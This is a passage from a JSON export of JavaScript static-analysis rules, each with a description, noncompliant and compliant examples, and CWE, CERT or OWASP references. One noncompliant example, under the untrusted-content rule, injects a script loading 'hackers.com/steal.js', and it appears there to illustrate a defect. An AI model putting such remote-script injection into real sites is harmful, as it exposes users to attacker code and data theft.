yet created\n}\nif (myObject.fname == undefined) {\n \/\/ no real way of knowing the true state of myObject.fname\n}\n<\/pre>","status":"READY","tags":["rank1"],"langName":"JavaScript","params":[],"type":"CODE_SMELL"},{"key":"javascript:S2208","repo":"javascript","name":"Wildcard imports should not be used","htmlDesc":"<p>On the principle that clearer code is better code, you should explicitly <code>import<\/code> the things you want to use in a module. Using\n<code>import *<\/code> imports everything in the module, and runs the risk of confusing maintainers. Similarly, <code>export * from \"module\";<\/code>\nimports and then re-exports everything in the module, and runs the risk of confusing not just maintainers but also users of the module.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nimport * as Imported from \"aModule\"; \/\/ Noncompliant\n<\/pre>","status":"READY","tags":["rank5"],"langName":"JavaScript","params":[],"type":"CODE_SMELL"},{"key":"javascript:S2228","repo":"javascript","name":"Console logging should not be used","htmlDesc":"<p>Debug statements are always useful during development. But include them in production code - particularly in code that runs client-side - and you\nrun the risk of inadvertently exposing sensitive information, slowing down the browser, or even erroring-out the site for some users.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nconsole.log(password_entered); \/\/ Noncompliant\n<\/pre>\n<h2>See<\/h2>\n<ul>\n <li> <a href=\"https:\/\/www.owasp.org\/index.php\/Top_10_2013-A6-Sensitive_Data_Exposure\">OWASP Top Ten 2013 Category A6<\/a> - Sensitive Data Exposure\n <\/li>\n<\/ul>","status":"READY","tags":["rank5"],"langName":"JavaScript","params":[],"type":"VULNERABILITY"},{"key":"javascript:S2234","repo":"javascript","name":"Parameters should be passed in the correct order","htmlDesc":"<p>When the names of arguments in a function call match the names of the function parameters, it contributes to clearer, more readable code. However,\nwhen the names match, but are passed in a different order than the function parameters, it indicates a mistake in the parameter order which will\nlikely lead to unexpected results.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nfunction divide(divisor, dividend) {\n return divisor\/dividend;\n}\n\nfunction doTheThing() {\n var divisor = 15;\n var dividend = 5;\n\n var result = divide(dividend, divisor); \/\/ Noncompliant; operation succeeds, but result is unexpected\n \/\/...\n}\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\nfunction divide(divisor, dividend) {\n return divisor\/dividend;\n}\n\nfunction doTheThing() {\n var divisor = 15;\n var dividend = 5;\n\n var result = divide(divisor, dividend);\n \/\/...\n}\n<\/pre>","status":"READY","tags":["rank2"],"langName":"JavaScript","params":[],"type":"BUG"},{"key":"javascript:S2251","repo":"javascript","name":"A \"for\" loop update clause should move the counter in the right direction","htmlDesc":"<p>A <code>for<\/code> loop with a stop condition that can never be reached, such as one with a counter that moves in the wrong direction, will run\ninfinitely. While there are occasions when an infinite loop is intended, the convention is to construct such loops as <code>while<\/code> loops. More\ntypically, an infinite <code>for<\/code> loop is a bug. <\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nfor (var i = 0; i < strings.length; i--) { \/\/ Noncompliant;\n \/\/...\n}\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\nfor (var i = 0; i < strings.length; i++) {\n \/\/...\n}\n<\/pre>\n<h2>See<\/h2>\n<ul>\n <li> <a href=\"https:\/\/www.securecoding.cert.org\/confluence\/x\/zYEzAg\">CERT, MSC54-J.<\/a> - Avoid inadvertent wrapping of loop counters <\/li>\n<\/ul>","status":"READY","tags":["rank2"],"langName":"JavaScript","params":[],"type":"BUG"},{"key":"javascript:S2392","repo":"javascript","name":"Variables should be defined in the blocks where they are used","htmlDesc":"<p>A variable that is declared at function scope, but only used inside a single block should be declared in that block, and variables that are\ndeclared inside a block but used outside of it (which is possible with a <code>var<\/code>-style declaration) should be declared outside the block.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nfunction doSomething(a, b) {\n var i; \/\/ Noncompliant; should be declared in if-block\n if (a > b) {\n i = a;\n console.log(i);\n var x = a - b; \/\/ Noncompliant; should be declared outside if-block\n }\n\n if (a > 4) {\n console.log(x);\n }\n\n return a+b;\n}\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\nfunction doSomething(a, b) {\n var x = a - b;\n\n if (a > b) {\n var i = a;\n console.log(i);\n }\n\n if (a > 4) {\n console.log(x);\n }\n\n return a+b;\n}\n<\/pre>","status":"READY","tags":["rank1"],"langName":"JavaScript","params":[],"type":"CODE_SMELL"},{"key":"javascript:S2424","repo":"javascript","name":"Built-in objects should not be overridden","htmlDesc":"<p>Overriding an object changes its behavior and could potentially impact all code using that object. Overriding standard, built-in objects could\ntherefore have broad, potentially catastrophic effects on previously-working code.<\/p>\n<p>This rule detects overrides of the following native objects:<\/p>\n<ul>\n <li> Fundamental objects - Object, Function, Boolean, Symbol, Error, EvalError, InternalError, RangeError, ReferenceError, SyntaxError, TypeError,\n URIError <\/li>\n <li> Numbers and dates - Number, Math, Date <\/li>\n <li> Text processing - String, RegExp <\/li>\n <li> Indexed collections - Array, Int8Array, Uint8Array, Uint8ClampedArray, Int16Array, Unit16Array, Int32Array, Uint32Array, Float32Array,\n Float64Array <\/li>\n <li> Keyed collections - Map, Set, WeakMap, WeakSet <\/li>\n <li> Structured data - ArrayBuffer, DataView, JSON <\/li>\n <li> Control abstraction objects - Promise <\/li>\n <li> Reflection - Reflect, Proxy <\/li>\n <li> Internationalization - Intl <\/li>\n <li> Non-standard objects - Generator, Iterator, ParallelArray, StopIteration <\/li>\n<\/ul>","status":"READY","tags":["rank2"],"langName":"JavaScript","params":[],"type":"BUG"},{"key":"javascript:S2427","repo":"javascript","name":"The base should be provided to \"parseInt\"","htmlDesc":"<p>The <code>parseInt<\/code> function has two versions, one that takes a base value as a second argument, and one that does not. Unfortunately using\nthe single-arg version can result in unexpected results on older browsers. <\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nparseInt(\"010\"); \/\/ Noncompliant; pre-2013 browsers may return 8\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\nparseInt(\"010\", 10);\n<\/pre>","status":"READY","tags":["rank4"],"langName":"JavaScript","params":[],"type":"BUG"},{"key":"javascript:S2432","repo":"javascript","name":"Setters should not return values","htmlDesc":"<p>Functions declared with the <code>set<\/code> keyword will automatically return the values they were passed. Thus any value explicitly returned from\na setter will be ignored, and explicitly returning a value is an error.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nvar person = {\n \/\/ ...\n set name(name) {\n this.name = name;\n return 42; \/\/ Noncompliant\n }\n}\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\nvar person = {\n \/\/ ...\n set name(name) {\n this.name = name;\n }\n}\n<\/pre>","status":"READY","tags":["rank3"],"langName":"JavaScript","params":[],"type":"BUG"},{"key":"javascript:S2508","repo":"javascript","name":"The names of model properties should not contain spaces","htmlDesc":"<p>When using the Backbone.js framework, the names of model attributes should not contain spaces. This is because the Events object accepts\nspace-delimited lists of events, so an attributes with spaces in the names could be misinterpreted.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nPerson = Backbone.Model.extend({\n defaults: {\n 'first name': 'Bob', \/\/ Noncompliant\n 'birth date': new Date() \/\/ Noncompliant\n },\n });\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\nPerson = Backbone.Model.extend({\n defaults: {\n firstName: 'Bob',\n birthDate: new Date()\n },\n });\n<\/pre>","status":"READY","tags":["rank1"],"langName":"JavaScript","params":[],"type":"BUG"},{"key":"javascript:S2583","repo":"javascript","name":"Conditionally executed blocks should be reachable","htmlDesc":"<p>Conditional expressions which are always <code>true<\/code> or <code>false<\/code> can lead to dead code. Such code is always buggy and should never\nbe used in production.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\na = false;\nif (a) { \/\/ Noncompliant\n doSomething(); \/\/ never executed\n}\n\nif (!a || b) { \/\/ Noncompliant; \"!a\" is always \"true\", \"b\" is never evaluated\n doSomething();\n} else {\n doSomethingElse(); \/\/ never executed\n}\n<\/pre>\n<h2>See<\/h2>\n<ul>\n <li> MISRA C:2004, 13.7 - Boolean operations whose results are invariant shall not be permitted. <\/li>\n <li> MISRA C:2012, 14.3 - Controlling expressions shall not be invariant <\/li>\n <li> <a href=\"http:\/\/cwe.mitre.org\/data\/definitions\/570.html\">MITRE, CWE-570<\/a> - Expression is Always False <\/li>\n <li> <a href=\"http:\/\/cwe.mitre.org\/data\/definitions\/571\">MITRE, CWE-571<\/a> - Expression is Always True <\/li>\n <li> <a href=\"https:\/\/www.securecoding.cert.org\/confluence\/x\/NYA5\">CERT, MSC12-C.<\/a> - Detect and remove code that has no effect or is never\n executed <\/li>\n <li> <a href=\"https:\/\/www.securecoding.cert.org\/confluence\/x\/SIIyAQ\">CERT, MSC12-CPP.<\/a> - Detect and remove code that has no effect <\/li>\n<\/ul>","status":"READY","tags":["rank1"],"langName":"JavaScript","params":[],"type":"BUG"},{"key":"javascript:S2589","repo":"javascript","name":"Boolean expressions should not be gratuitous","htmlDesc":"<p>If a boolean expression doesn't change the evaluation of the condition, then it is entirely unnecessary, and can be removed. If it is gratuitous\nbecause it does not match the programmer's intent, then it's a bug and the expression should be fixed.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\na = true;\nif (a) { \/\/ Noncompliant\n doSomething();\n}\n\nif (b && a) { \/\/ Noncompliant; \"a\" is always \"true\"\n doSomething();\n}\n\nif (c || !a) { \/\/ Noncompliant; \"!a\" is always \"false\"\n doSomething();\n}\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\na = true;\nif (foo(a)) {\n doSomething();\n}\n\nif (b) {\n doSomething();\n}\n\nif (c) {\n doSomething();\n}\n<\/pre>\n<h2>See<\/h2>\n<ul>\n <li> MISRA C:2004, 13.7 - Boolean operations whose results are invariant shall not be permitted. <\/li>\n <li> MISRA C:2012, 14.3 - Controlling expressions shall not be invariant <\/li>\n <li> <a href=\"http:\/\/cwe.mitre.org\/data\/definitions\/489\">MITRE, CWE-489<\/a> - Leftover Debug Code <\/li>\n <li> <a href=\"http:\/\/cwe.mitre.org\/data\/definitions\/571\">MITRE, CWE-571<\/a> - Expression is Always True <\/li>\n <li> <a href=\"https:\/\/www.securecoding.cert.org\/confluence\/x\/NYA5\">CERT, MSC12-C.<\/a> - Detect and remove code that has no effect or is never\n executed <\/li>\n <li> <a href=\"https:\/\/www.securecoding.cert.org\/confluence\/x\/SIIyAQ\">CERT, MSC12-CPP.<\/a> - Detect and remove code that has no effect <\/li>\n<\/ul>","status":"READY","tags":["rank3"],"langName":"JavaScript","params":[],"type":"CODE_SMELL"},{"key":"javascript:S2611","repo":"javascript","name":"Untrusted content should not be included","htmlDesc":"<p>Including content in your site from an untrusted source can expose your users to attackers and even compromise your own site. For that reason, this\nrule raises an issue for each non-relative URL.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nfunction include(url) {\n var s = document.createElement(\"script\");\n s.setAttribute(\"type\", \"text\/javascript\");\n s.setAttribute(\"src\", url);\n document.body.appendChild(s);\n}\ninclude(\"http:\/\/hackers.com\/steal.js\") \/\/ Noncompliant\n<\/pre>\n<h2>See<\/h2>\n<ul>\n <li> <a href=\"http:\/\/cwe.mitre.org\/data\/definitions\/829\">MITRE, CWE-829<\/a> - Inclusion of Functionality from Untrusted Control Sphere <\/li>\n <li> <a href=\"http:\/\/www.sans.org\/top25-software-errors\/\">SANS Top 25<\/a> - Risky Resource Management <\/li>\n<\/ul>","status":"READY","tags":["rank5"],"langName":"JavaScript","params":[{"key":"domainsToIgnore","htmlDesc":"Comma-delimited list of domains to ignore. Regexes may be used, e.g. (.*\\.)?example.com,foo.org","type":"STRING"}],"type":"VULNERABILITY"},{"key":"javascript:S2688","repo":"javascript","name":"\"NaN\" should not be used in comparisons","htmlDesc":"<p><code>NaN<\/code> is not equal to anything, even itself. Testing for equality or inequality against <code>NaN<\/code> will yield predictable results,\nbut probably not the ones you want. <\/p>\n<p>Instead, the best way to see whether a variable is equal to <code>NaN<\/code> is to use <code>Number.isNaN()<\/code>, since ES2015, or (perhaps\ncounter-intuitively) to compare it to itself. Since <code>NaN !== NaN<\/code>, when <code>a !== a<\/code>, you know it must equal <code>NaN<\/code>.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nvar a = NaN;\n\nif (a === NaN) { \/\/ Noncompliant; always false\n console.log(\"a is not a number\"); \/\/ this is dead code\n}\nif (a !== NaN) { \/\/ Noncompliant; always true\n console.log(\"a is not NaN\"); \/\/ this statement is not necessarily true\n}\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\nif (Number.isNaN(a)) {\n console.log(\"a is not a number\");\n}\nif (!Number.isNaN(a)) {\n console.log(\"a is not NaN\");\n}\n<\/pre>\n<h2>See<\/h2>\n<ul>\n <li> <a href=\"https:\/\/www.securecoding.cert.org\/confluence\/x\/7AEqAQ\">CERT, NUM07-J.<\/a> - Do not attempt comparisons with NaN <\/li>\n<\/ul>","status":"READY","tags":["rank1"],"langName":"JavaScript","params":[],"type":"BUG"},{"key":"javascript:S2692","repo":"javascript","name":"\"indexOf\" checks should not be for positive numbers","htmlDesc":"<p>Most checks against an <code>indexOf<\/code> call against a string or array compare it with -1 because 0 is a valid index. Any checks which look for\nvalues >0 ignore the first element, which is likely a bug.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nvar color = \"blue\";\nvar name = \"ishmael\";\nvar number = 123;\n\nvar arr = [color, name];\n\nif (arr.indexOf(\"blue\") > 0) { \/\/ Noncompliant\n \/\/ ...\n}\nif (arr[0].indexOf(\"ish\") > 0 { \/\/ Noncompliant\n \/\/ ...\n}\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\nvar color = \"blue\";\nvar name = \"ishmael\";\nvar number = 123;\n\nvar arr = [color, name];\n\nif (arr.indexOf(\"blue\") >= 0) {\n \/\/ ...\n}\nif (arr[0].indexOf(\"ish\") > -1) {\n \/\/ ...\n}\n<\/pre>","status":"READY","tags":["rank3"],"langName":"JavaScript","params":[],"type":"CODE_SMELL"},{"key":"javascript:S2714","repo":"javascript","name":"Element type selectors should not be used with class selectors","htmlDesc":"<p>Using element type in class selectors is slower than using only the class selector.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nvar $products = $(\"div.products\"); \/\/ Noncompliant - slow\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\nvar $products = $(\".products\"); \/\/ Compliant - fast\n<\/pre>","status":"READY","tags":["rank5"],"langName":"JavaScript","params":[],"type":"CODE_SMELL"},{"key":"javascript:S2715","repo":"javascript","name":"\"find\" should be used to select the children of an element known by id","htmlDesc":"<p>The use of <code>find<\/code> allows <code>document.getElementById()<\/code> to be used for the top-level selection, and saves the jQuery Sizzle\nengine for where it's really needed. That makes the query faster, and your application more responsive.<\/p>\n<p>From the jQuery documentation:<\/p>\n<blockquote>\n <p>Beginning your selector with an ID is always best.<\/p>\n <p>The <code>.find()<\/code> approach is faster because the first selection is handled without going through the Sizzle selector engine \u2013 ID-only\n selections are handled using <code>document.getElementById()<\/code>, which is extremely fast because it is native to the browser.<\/p>\n<\/blockquote>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nvar $productIds = $(\"#products div.id\"); \/\/ Noncompliant - a nested query for Sizzle selector engine\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\nvar $productIds = $(\"#products\").find(\"div.id\"); \/\/ Compliant - #products is already selected by document.getElementById() so only div.id needs to go through Sizzle selector engine\n<\/pre>","status":"READY","tags":["rank3"],"langName":"JavaScript","params":[],"type":"CODE_SMELL"},{"key":"javascript:S2757","repo":"javascript","name":"\"=+\" should not be used instead of \"+=\"","htmlDesc":"<p>The use of operators pairs (<code>=+<\/code> or <code>=-<\/code>) where the reversed, single operator was meant (<code>+=<\/code> or <code>-=<\/code>)\nwill compile and run, but not produce the expected results.<\/p>\n<p>This rule raises an issue when <code>=+<\/code> and <code>=-<\/code> are used without any space between the two operators and when there is at least\none whitespace after.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nvar target =-5;\nvar num = 3;\n\ntarget =- num; \/\/ Noncompliant; target = -3. Is that really what's meant?\ntarget =+ num; \/\/ Noncompliant; target = 3\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\nvar target = -5;\nvar num = 3;\n\ntarget = -num; \/\/ Compliant; intent to assign inverse value of num is clear\ntarget += num;\n<\/pre>","status":"READY","tags":["rank3"],"langName":"JavaScript","params":[],"type":"BUG"},{"key":"javascript:S2770","repo":"javascript","name":"Deprecated jQuery methods should not be used","htmlDesc":"<p>Deprecation is a warning that a method has been superseded, and will eventually be removed. The deprecation period allows you to make a smooth\ntransition away from the aging, soon-to-be-retired technology.<\/p>\n<p>This rule raises an issue when any of the following methods is used:<\/p>\n<ul>\n <li> <code>.andSelf()<\/code> <\/li>\n <li> <code>.context<\/code> <\/li>\n <li> <code>.die()<\/code> <\/li>\n <li> <code>.error()<\/code> <\/li>\n <li> <code>jQuery.boxModel<\/code> <\/li>\n <li> <code>jQuery.browser<\/code> <\/li>\n <li> <code>jQuery.sub()<\/code> <\/li>\n <li> <code>jQuery.support<\/code> <\/li>\n <li> <code>.live()<\/code> <\/li>\n <li> <code>.load()<\/code> <\/li>\n <li> <code>.selector<\/code> <\/li>\n <li> <code>.size()<\/code> <\/li>\n <li> <code>.toggle()<\/code> <\/li>\n <li> <code>.unload()<\/code> <\/li>\n<\/ul>","status":"READY","tags":["rank3"],"langName":"JavaScript","params":[],"type":"CODE_SMELL"},{"key":"javascript:S2817","repo":"javascript","name":"Web SQL databases should not be used","htmlDesc":"<p>The Web SQL Database standard never saw the light of day. It was first formulated, then deprecated by the W3C and was only implemented in some\nbrowsers. (It is not supported in Firefox or IE.)<\/p>\n<p>Further, the use of a Web SQL Database poses security concerns, since you only need its name to access such a database.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nvar db = window.openDatabase(\"myDb\", \"1.0\", \"Personal secrets stored here\", 2*1024*1024); \/\/ Noncompliant\n<\/pre>\n<h2>See<\/h2>\n<ul>\n <li> <a href=\"https:\/\/www.owasp.org\/index.php\/Top_10_2013-A6-Sensitive_Data_Exposure\">OWASP Top Ten 2013 Category A6<\/a> - Sensitive Data Exposure\n <\/li>\n <li> <a href=\"https:\/\/www.owasp.org\/index.php\/Top_10_2013-A9-Using_Components_with_Known_Vulnerabilities\">OWASP Top Ten 2013 Category A9<\/a> - Using\n Components with Known Vulnerabilities <\/li>\n<\/ul>","status":"READY","tags":["rank1"],"langName":"JavaScript","params":[],"type":"VULNERABILITY"},{"key":"javascript:S2819","repo":"javascript","name":"Cross-document messaging domains should be carefully restricted","htmlDesc":"<p>HTML5 adds the ability to send messages to documents served from other domains. According to the specification:<\/p>\n<blockquote>\n Authors should not use the wildcard keyword (\n <code>*<\/code>) in the\n <code>targetOrigin<\/code> argument in messages that contain any confidential information, as otherwise there is no way to guarantee that the message\n is only delivered to the recipient to which it was intended.\n<\/blockquote>\n<p>To mitigate the risk of sending sensitive information to a document served from a hostile or unknown domain, this rule raises an issue each time\n<code>Window.postMessage<\/code> is used.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nvar myWindow = document.getElementById('myIFrame').contentWindow;\nmyWindow.postMessage(message, \"*\"); \/\/ Noncompliant; how do you know what you loaded in 'myIFrame' is still there?\n<\/pre>\n<h2>See<\/h2>\n<ul>\n <li> <a href=\"https:\/\/www.owasp.org\/index.php\/Top_10_2013-A3-Cross-Site_Scripting_(XSS)\">OWASP Top Ten 2013 Category A3<\/a> - Cross-Site Scripting\n (XSS) <\/li>\n<\/ul>","status":"READY","tags":["rank4"],"langName":"JavaScript","params":[],"type":"VULNERABILITY"},{"key":"javascript:S2870","repo":"javascript","name":"\"delete\" should not be used on arrays","htmlDesc":"<p>The <code>delete<\/code> operator can be used to remove a property from any object. Arrays are objects, so the <code>delete<\/code> operator can be\nused here too, but if it is, a hole will be left in the array because the indexes\/keys won't be shifted to reflect the deletion. <\/p>\n<p>The proper method for removing an element at a certain index would be:<\/p>\n<ul>\n <li> <code>Array.prototype.splice<\/code> - add\/remove elements from the the array <\/li>\n <li> <code>Array.prototype.pop<\/code> - add\/remove elements from the end of the array <\/li>\n <li> <code>Array.prototype.shift<\/code> - add\/remove elements from the beginning of the array <\/li>\n<\/ul>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nvar myArray = ['a', 'b', 'c', 'd'];\n\ndelete myArray[2]; \/\/ Noncompliant. myArray => ['a', 'b', undefined, 'd']\nconsole.log(myArray[2]); \/\/ expected value was 'd' but output is undefined\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\nvar myArray = ['a', 'b', 'c', 'd'];\n\n\/\/ removes 1 element from index 2\nremoved = myArray.splice(2, 1); \/\/ myArray => ['a', 'b', 'd']\nconsole.log(myArray[2]); \/\/ outputs 'd'\n<\/pre>","status":"READY","tags":["rank1"],"langName":"JavaScript","params":[],"type":"CODE_SMELL"},{"key":"javascript:S2873","repo":"javascript","name":"Calls should not be made to non-callable values","htmlDesc":"<p>The fact that JavaScript is not a strongly typed language allows developers a lot of freedom, but that freedom can be dangerous if you go too far\nwith it. <\/p>\n<p>Specifically, it is syntactically acceptable to invoke any expression as though its value were a function. But a <code>TypeError<\/code> may be\nraised if you do.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nfoo = 1;\nfoo(); \/\/ Noncompliant; TypeError\n\nfoo = undefined;\nfoo(); \/\/ Noncompliant; TypeError\n<\/pre>","status":"READY","tags":["rank1"],"langName":"JavaScript","params":[],"type":"BUG"},{"key":"javascript:S2898","repo":"javascript","name":"\"[type=...]\" should be used to select elements by type","htmlDesc":"<p>While <code>:<element_type><\/code> and <code>[type=\"<element_type>\"]<\/code> can both be used in jQuery to select elements by their\ntype, <code>[type=\"<element_type>\"]<\/code> is far faster because it can take advantage of the native DOM <code>querySelectorAll()<\/code> method\nin modern browsers. <\/p>\n<p>This rule raises an issue when following selectors are used:<\/p>\n<ul>\n <li> <code>:checkbox<\/code> <\/li>\n <li> <code>:file<\/code> <\/li>\n <li> <code>:image<\/code> <\/li>\n <li> <code>:password<\/code> <\/li>\n <li> <code>:radio<\/code> <\/li>\n <li> <code>:reset<\/code> <\/li>\n <li> <code>:text<\/code> <\/li>\n<\/ul>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nvar input = $( \"form input:radio\" ); \/\/ Noncompliant\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\nvar input = $( \"form input[type=radio]\" ); \/\/ Compliant\n<\/pre>","status":"READY","tags":["rank3"],"langName":"JavaScript","params":[],"type":"CODE_SMELL"},{"key":"javascript:S2990","repo":"javascript","name":"The global \"this\" object should not be used","htmlDesc":"<p>When the keyword <code>this<\/code> is used outside of an object, it refers to the global <code>this<\/code> object, which is the same thing as the\n<code>window<\/code> object in a standard web page. This could be confusing to maintainers. Instead, simply drop the <code>this<\/code>, or replace it\nwith <code>window<\/code>; it will have the same effect and be more readable.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nthis.foo = 1; \/\/ Noncompliant\nconsole.log(this.foo); \/\/ Noncompliant\n\nfunction MyObj() {\n this.foo = 1; \/\/ Compliant\n}\n\nMyObj.func1 = function() {\n if (this.foo == 1) { \/\/ Compliant\n \/\/ ...\n }\n}\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\nfoo = 1;\nconsole.log(foo);\n\nfunction MyObj() {\n this.foo = 1;\n}\n\nMyObj.func1 = function() {\n if (this.foo == 1) {\n \/\/ ...\n }\n}\n<\/pre>","status":"READY","tags":["rank1"],"langName":"JavaScript","params":[],"type":"CODE_SMELL"},{"key":"javascript:S2999","repo":"javascript","name":"\"new\" operators should be used with functions","htmlDesc":"<p>The <code>new<\/code> keyword should only be used with objects that define a constructor function. Use it with anything else, and you'll get a\n<code>TypeError<\/code> because there won't be a constructor function for the <code>new<\/code> keyword to invoke.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nfunction MyClass() {\n this.foo = 'bar';\n}\n\nvar someClass = 1;\n\nvar obj1 = new someClass; \/\/ Noncompliant;\nvar obj2 = new MyClass(); \/\/ Noncompliant if considerJSDoc parameter set to true. Compliant when considerJSDoc=false\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\n\/**\n * @constructor\n *\/\nfunction MyClass() {\n this.foo = 'bar';\n}\n\nvar someClass = function(){\n this.prop = 1;\n}\n\nvar obj1 = new someClass; \/\/ Compliant\nvar obj2 = new MyClass(); \/\/ Compliant regardless of considerJSDoc value\n<\/pre>","status":"READY","tags":["rank1"],"langName":"JavaScript","params":[{"key":"considerJSDoc","htmlDesc":"Consider only functions with @constructor tag as constructor functions","defaultValue":"false","type":"BOOLEAN"}],"type":"BUG"},{"key":"javascript:S3001","repo":"javascript","name":"\"delete\" should be used only with object properties","htmlDesc":"<p>The semantics of the <code>delete<\/code> operator are a bit tricky, and it can only be reliably used to remove properties from objects. Pass\nanything else to it, and you may or may not get the desired result.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nvar x = 1;\ndelete x; \/\/ Noncompliant\n\nfunction foo(){\n..\n}\n\ndelete foo; \/\/ Noncompliant\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\nvar obj = {\n x:1,\n foo: function(){\n ...\n }\n};\ndelete obj.x;\ndelete obj.foo;\n\n<\/pre>","status":"READY","tags":["rank1"],"langName":"JavaScript","params":[],"type":"BUG"},{"key":"javascript:S3358","repo":"javascript","name":"Ternary operators should not be nested","htmlDesc":"<p>Just because you <em>can<\/em> do something, doesn't mean you should, and that's the case with nested ternary operations. Nesting ternary operators\nresults in the kind of code that may seem clear as day when you write it, but six months later will leave maintainers (or worse - future you)\nscratching their heads and cursing.<\/p>\n<p>Instead, err on the side of clarity, and use another line to express the nested operation as a separate statement.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\npublic String getTitle(Person p) {\n\n return p.gender==Person.MALE?\"Mr. \":p.isMarried()?\"Mrs. \":\"Miss \" + p.getLastName(); \/\/ Noncompliant\n}\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\n\n String honorific = p.isMarried()?\"Mrs. \":\"Miss \";\n return p.gender==Person.MALE?\"Mr. \": honorific + p.getLastName();\n<\/pre>","status":"READY","tags":["rank5"],"langName":"JavaScript","params":[],"type":"CODE_SMELL"},{"key":"javascript:S3500","repo":"javascript","name":"Attempts should not be made to update \"const\" variables","htmlDesc":"<p>Variables declared with <code>const<\/code> cannot be modified. Unfortunately, attempts to do so don't always raise an error; in a non-ES2015\nenvironment, such an attempt might simply be ignored.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nconst pi = \"yes, please\";\npi = 3.14; \/\/ Noncompliant\n<\/pre>","status":"READY","tags":["rank1"],"langName":"JavaScript","params":[],"type":"BUG"},{"key":"javascript:S3509","repo":"javascript","name":"Default parameters should not cause side effects","htmlDesc":"<p>The assignment of default parameter values is generally intended to help the caller. But when a default assignment causes side effects, the caller\nmay not be aware of the extra changes or may not fully understand their implications. I.e. default assignments with side effects may end up hurting\nthe caller, and for that reason, they should be avoided.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nvar count = 0;\n\nfunction go(i = count++) { \/\/ Noncompliant\n console.log(i);\n}\n\ngo(); \/\/ outputs 0\ngo(7); \/\/ outputs 7\ngo(); \/\/ outputs 1\n<\/pre>","status":"READY","tags":["rank3"],"langName":"JavaScript","params":[],"type":"CODE_SMELL"},{"key":"javascript:S3513","repo":"javascript","name":"\"arguments\" should not be accessed directly","htmlDesc":"<p>The magic of JavaScript is that you can pass arguments to functions that don't declare parameters, and on the other side, you can use those\npassed-in arguments inside the no-args <code>function<\/code>. <\/p>\n<p>But just because you can, that does't mean you should. The expectation and use of arguments inside functions that don't explicitly declare them is\nconfusing to callers. No one should ever have to read and fully understand a function to be able to use it competently. <\/p>\n<p>If you don't want to name arguments explicitly, use the <code>...<\/code> syntax to specify that an a variable number of arguments is expected. Then\ninside the function, you'll be dealing with a first-class array, rather than an array-like structure.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nfunction concatenate() {\n let args = Array.prototype.slice.call(arguments); \/\/ Noncompliant\n return args.join(', ');\n}\n\nfunction doSomething(isTrue) {\n var args = Array.prototype.slice.call(arguments, 1); \/\/ Noncompliant\n if (!isTrue) {\n for (var arg of args) {\n ...\n }\n }\n}\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\nfunction concatenate(...args) {\n return args.join(', ');\n}\n\nfunction doSomething(isTrue, ...values) {\n if (!isTrue) {\n for (var value of values) {\n ...\n }\n }\n}\n<\/pre>","status":"READY","tags":["rank1"],"langName":"JavaScript","params":[],"type":"CODE_SMELL"},{"key":"javascript:S3514","repo":"javascript","name":"Destructuring syntax should be used for assignments","htmlDesc":"<p>ECMAScript 2015 introduced the ability to extract and assign multiple data points from an object or array simultaneously. This is called\n\"destructuring\", and it allows you to condense boilerplate code so you can concentrate on logic. <\/p>\n<p>This rule raises an issue when multiple pieces of data are extracted out of the same object or array and assigned to variables.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nfunction foo (obj1, obj2, array) {\n var a = obj1.a; \/\/ Noncompliant\n var b = obj1.b;\n\n var name = obj2.name; \/\/ ignored; there's only one extraction-and-assignment\n\n var zero = array[0]; \/\/ Noncompliant\n var one = array[1];\n}\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\nfunction foo (obj1, obj2, array) {\n var {a, b} = obj1;\n\n var {name} = obj2; \/\/ this syntax works because var name and property name are the same\n\n var [zero, one] = 